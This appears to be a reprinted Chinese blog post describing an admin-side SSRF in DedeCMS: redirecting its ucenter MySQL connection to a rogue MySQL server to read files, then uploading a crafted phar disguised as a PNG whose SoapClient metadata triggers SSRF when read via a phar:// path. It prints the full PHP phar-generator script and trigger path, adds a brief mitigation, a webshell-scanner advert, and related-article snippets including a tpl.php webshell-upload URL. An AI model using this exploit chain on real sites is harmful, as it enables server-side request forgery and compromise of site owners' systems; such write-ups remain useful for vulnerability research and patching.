php利用phar进行ssrf,DedeCMS 后台存在SSRF漏洞

最新推荐文章于 2023-05-06 12:20:51 发布
最新推荐文章于 2023-05-06 12:20:51 发布
阅读量151 收藏
点赞数

2a96caeea3b3bdf1cd3c8995317ad887.png

dedecms的后台存在ucenter功能,可以直接修改ucenter的配置,使网站的mysql连接。指向我们预先构造的rogue mysql server https://github.com/Gifts/Rogue-MySql-Server.git

设置之后我们就可以通过修改恶意服务端的设置来读取任意文件。 假如读取的文件路径是以phar协议开头的,那么读取的文件内容就会被反序列化。 根据dedecms的代码,我们可以利用soapclient内置类来构造反序列化pop链来ssrf。

class Control

{

var $tpl;

public $dsql;

function __construct(){

$this->dsql = new SoapClient(null,array('uri'=>'http://test:5555', 'location'=>'http://test:5555/aaa'));

}

}

@unlink("dedecms.phar");

$phar = new Phar("dedecms.phar");

$phar->startBuffering();

$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");

$o = new Control();

$phar->setMetadata($o);

$phar->addFromString("test.txt", "test");

$phar->stopBuffering();

?>

将生成的文件修改为dedecms.png,然后在dedecms上有很多地方都可以上传。

上传成功之后可以从文件列表中获取到图片链接。

phar://../uploads/allimg/190724/1_1529564891.png/test.txt

设置完成之后,刷新就可以触发ssrf。

解决方案:

临时解决方案

通过mysqli_options设置链接时禁用allow_local_infile配置可阻止该漏洞。

或在php.ini中改配置为mysqli.allow_local_infile = Off

推荐D盾—WEB查看工具:

软件使用自行研发不分扩展名的代码分析引擎,能分析更为隐藏的WebShell后门行为。

引擎特别针对,一句话后门,变量函数后门,${}执行 ,`执行,

preg_replace执行,call_user_func,file_put_contents,fputs 等特殊函数

的参数进行针对性的识别,能查杀更为隐藏的后门,

并把可疑的参数信息展现在你面前,让你能更快速的了解后门的情况

新版特别针对 dedecms 的{dede:php}{/dede:php}代码加入了识别!

软件加入隔离功能,并且可以还原!

如有不能识别的webshell请使用上传样本功能上传给我们,我们将后期加入识别!

cce76f479c02a25ee57b65b3c86892fb.png

转载请注明来源网址:https://www.xiuzhanwang.com/dedecms_aq/1764.html

李星河
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSRF漏洞——redis
Hacker_by_V的博客
09-12 412
Redis介绍 Redis是一个开源的使用ANSI C语言编写,支持网络,可基于内存亦和持久化的日志型,Key-Value数据库,并提供多种语言的API,通常被称为数据结构服务器。 通常点来说就是一个数据库,像这样的Redis经常用来去存放一些缓存,缓存文件之类的。 那么Redis通常会引发一些未授权的漏洞。 Redis因为配置不当可以未授权访问,攻击者不需要认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。 攻击者可以通过eval执行LUA代码或者通过数据备份功能往磁盘
dedeCMS后台代码执行漏洞-CNVD-2018-01221
飞鱼的企鹅的博客
06-20 1972
复现的第一个漏洞,CNVD-2018-01221, DeDeCMS简介 织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。DeDeCMS V5.7 SP2版本中的tpl.php存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。
记一次简单的PHP代码审计(SSRF案例)
weixin_30587927的博客
08-08 599
题目链接: http://oj.momomoxiaoxi.com:9090/ 用dirsearch对网址进行扫描,发现robots.txt 命令行: python3 dirsearch.py -u "http://oj.momomoxiaoxi.com:9090/" -e * 于是输入网址打开这个文件: http://oj.momomoxiaoxi.com:909...
漏洞学习——SSRF】人人网几处站点存在SSRF漏洞
Fly_鹏程万里
02-22 947
漏洞学习 使用ssrf可进行内网渗透,利用跳转可进行其他协议探测是一个不错的姿势 http://war.gamebbs.renren.com/forum.php?mod=ajax&amp;action=downremoteimg&amp;message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog...
php利用phar进行ssrf,blackhat议题深入 | phar反序列化
weixin_35888497的博客
03-11 278
在Blackhat2018,来自Secarma的安全研究员Sam Thomas讲述了一种攻击 PHP 应用的新方式,利用这种方法可以在不使用unserialize()函数的情况下触发 PHP 反序列化漏洞漏洞原理漏洞触发点在使用phar://协议读取文件的时候,文件内容会被解析成phar对象,然后phar对象内的Metadata信息会被反序列化。其实这个漏洞点并不是第一次出现,早在hitcon2...
利用PHAR协议进行PHP反序列化攻击1
08-03
PHP反序列化攻击是一种常见的安全漏洞利用方式,其中PHARPhp ARchive)协议是这类攻击的一个关键路径。PHARPHP中用于打包和分发代码的机制,类似于Java的JAR文件。在PHP 5.3及以上版本中,默认支持PHAR,但为了...
phpphar包的使用教程详解
10-17
本文将详细介绍如何在PHP中使用`phar`包进行打包和解压操作。 首先,确保`phar`扩展在你的PHP环境中已经启用。你需要检查并修改`php.ini`配置文件,将`phar.readonly`设置为`Off`,这样你才能创建和修改`phar`文件...
PHPphar包的使用教程
10-19
PHP中,`phar`(PHP Archive)是一种文件格式,允许开发者将多个PHP文件、资源和其他相关文件打包成单一的可执行文件,类似于Java的JAR文件。自PHP 5.3版本起,`phar`被引入,提供了一种高效且方便的方式来管理和...
pharc:PHP项目Phar编译器
05-19
编写PHP Phar编译器Pharc是一个项目工具,用于将您PHP应用程序编译为文件。 它通过获取一个文件来做到这一点,该文件指定如何组合文件,然后生成请求的输出文件。 这与编译成机器代码不同用Pharc制作的PHAR的解剖+--...
PharTools:一个强大PHP-CLI工具,用于管理pharPHP-Archive)文件
05-26
Phar工具 PharTools是功能强大PHP命令行工具,用于管理pharPHP存档)文件。 它允许创建,提取,编辑和查看phar档案。 它还包括一个简单的API,可在您自己的脚本上实现PharTools功能。 特征: 创建Phar档案 提取...
php利用phar进行ssrf,php phar反序列化任意执行代码
weixin_34489089的博客
03-11 416
2018年原理一。关于流包装stream wrapper大多数的文件操作允许使用各种URL协议去访问文件路径,如data://,zlib://,php://例如常见的有include('php://filter/read=convert.base64-encode/resource=index.php')include('data://text/plain;base64,xxxxx')phar:/...
dedecms织梦后台存在SSRF漏洞怎么解决
09-05 379
设置之后我们就可以通过修改恶意服务端的设置来读取任意文件。假如读取的文件路径是以phar协议开头的,那么读取的文件内容就会被反序列化。根据dedecms的代码,我们可以利用soapclient内置类来构造反序列化pop链来ssrf。dedecms后台存在ucenter功能,可以直接修改ucenter的配置,使网站的mysql连接。将生成的文件修改为dedecms.png,然后在dedecms上有很多地方都可以上传。上传成功之后可以从文件列表中获取到图片链接。设置完成之后,刷新就可以触发ssrf。
ssrf漏洞总结
最新发布
wwwwyyyrre的博客
05-06 205
内网又称,是指在某一区域内由多台计算机以及网络设备构成的网络,比如校园网、政府网等,一般方圆几公里。要进行内网访问 最常用的就是127.0.0.1127.0.0.1是本地的ip地址 也是最常用的访问内网的ip地址拓展 X-Forwarded-For:X-Forwarded-For 是一个 HTTP 扩展头部,主要是为了让 Web 服务器获取访问用户的真实 IP 地址,但是这个IP却未必是真实的 我们可以通过伪造X-Forwarded-For来伪造本地管理员登陆从而达到目的。
Windows下的一种PHP隐蔽后门姿势
Mi1k7ea
12-09 1812
在Windows中的PHP解释环境中有两个函数能够自动加载文件,即auto_prepend_file和auto_append_file,其在php.ini中可修改成任意文件,可为PHP或DLL文件。将后门代码写入这两个文件,再修改include_path为后门文件的绝对路径,则Web站点下所有的PHP文件都可以作为PHP后门。 1、修改auto_prepend_file和auto_append_...
php序列化 命令执行,利用phar实行php反序列化命令执行漏洞复现
weixin_34229622的博客
03-18 197
利用phar实行php反序列化命令执行(测试环境复现)前言一般说到反序列化漏洞,第一反应都是unserialize()函数。然而安全研究员Sam Thomas分享了议题”It’s a PHP unserialization vulnerability Jim, but not as we know it”,利用phar伪协议会将用户自定义的meta-data序列化的形式存储这一特性,扩展php反序...
csrf,ssrf,rce,文件包含漏洞,文件上传漏洞
nightswatch1的博客
04-21 3397
21 CSRF与SSRF漏洞 21.1课程大纲 参考链接: 【小迪安全】Day29web漏洞-CSRF及SSRF漏洞案例讲解-哔哩哔哩(bilibili.com) 正在上传…重新上传取消 参考①:cnblogs.com/dogecheng/p/11583412.thml 21.2CSRF...
关于MYSQL LOAD DATA LOCAL INFILE 支持问题
37度2
10-12 1万+
关于MYSQL LOAD DATA LOCAL INFILE 支持问题 执行报错:ERROR 1148 (42000): The used command is not allowed with this MySQL version 解决方法: 先进入MYSQL检查一下版本号:5.1或者以上的都支持。 mysql> select version() 1.由于MYSQL编译安装时默认不
CTF 中的 PHP 漏洞利用总结
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
2021-10-16 网安实验-Reverse-DedeCMS常见漏洞总结
热门推荐
时光隧道
10-16 4万+
利用token上传木马 漏洞简介 Dedecms V5.7 SP2版本中的tpl.php存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。该漏洞利用需要登录后台,并且后台的账户权限是管理员权限。 复现 首先获取token,访问:/dede/tpl.php?action=upload 然后访问:/dede/tpl.php?filename=1.lib.php&action=savetagfile&content=<?php phpinfo();?>&
LightCMS后台Phar反序列化RCE分析
"LightCMS全版本后台存在 Remote Code Execution (RCE) 0day漏洞,该漏洞通过Phar反序列化技术利用Laravel框架的弱点。攻击者可以通过图像上传功能上传phar文件,并通过特定的控制器方法触发RCE。分析过程中涉及到的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值